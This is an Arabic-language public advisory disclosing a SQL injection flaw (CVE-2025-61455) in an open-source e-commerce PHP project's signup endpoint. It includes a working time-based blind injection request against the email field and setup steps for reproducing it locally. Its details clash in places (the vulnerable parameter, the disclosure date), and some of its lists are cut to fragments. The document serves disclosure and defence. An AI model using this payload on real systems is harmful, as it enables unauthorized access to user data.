
الإفصاح العام وإثبات المفهوم لـ CVE-2025-61455، وهي ثغرة حقن SQL حرجة في مشروع التجارة الإلكترونية الإصدار 1.0، بما في ذلك التفاصيل الفنية وإثبات المفهوم (PoC) وتوصيات التخفيف.
تاريخ الإفصاح: 14 أكتوبر 2025
معرف CVE: CVE-2025-61455
الخطورة: حرجة (CVSS 9.8)
توجد ثغرة حرجة من نوع حقن SQL في E-commerce Project v1.0، وتحديدًا في نقطة النهاية signup.inc.php. يقوم التطبيق بإدراج مدخلات المستخدم غير المنقّاة مباشرةً في استعلامات SQL، مما يسمح للمهاجمين غير المصادق عليهم بتجاوز المصادقة وتنفيذ أوامر SQL عشوائية.
تم تخصيص المعرّف CVE-2025-61455 لهذه المشكلة. في وقت الإفصاح العام، لم يتوفر أي تصحيح رسمي.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpيستخدم التطبيق مدخلات غير منقّاة مباشرةً في استعلامات SQL دون أي تحقق من صحة المدخلات أو استخدام عبارات مُعدّة مسبقًا. توجد الثغرة في معامل aid داخل ملف signup.inc.php.
يمكن للمهاجم حقن كود SQL خبيث عبر معامل البريد الإلكتروني، مما يتيح هجمات حقن SQL العمياء القائمة على الوقت.
مثال على نمط الكود المعرض للخطر:
$query = "SELECT * FROM table WHERE email='$email'";
يسمح هذا بحمولات حقن يمكنها التلاعب بمنطق الاستعلام واستخراج بيانات حساسة.
| معرف CWE | العنوان |
|---|---|
| CWE-89 | تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL |
| الدرجة | الخطورة | سلسلة المتجهات |
|---|---|---|
| 9.8 | حرجة | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
قد يؤدي الاستغلال الناجح إلى:
git clone https://github.com/Bhabishya-123/E-commerce.git
استخدم XAMPP/LAMP لنشر المشروع وانتقل إلى:
http://localhost/e-commerce-main/includes/signup.inc.php
أرسل طلب HTTP الخبيث التالي:
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
التفسير:
يحتوي معامل البريد الإلكتروني على حمولة حقن SQL قائمة على الوقت: '+(select*from(select(sleep(20)))a)+'
إذا تأخر التطبيق لمدة 20 ثانية قبل الاستجابة، فإن حقن SQL يكون ناجحًا.
mysqli_prepare() أو PDO).| الحدث | التاريخ |
|---|---|
| اكتشاف الثغرة | 16 سبتمبر 2025 |
| الإفصاح العام | 13 أكتوبر 2025 |
| التصحيح المتاح | ❌ غير متاح وقت الإفصاح |
تم اكتشاف هذه الثغرة والإفصاح عنها بمسؤولية بواسطة:
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 تم نشر هذا التقرير بشكل مستقل بسبب عدم استجابة البائع.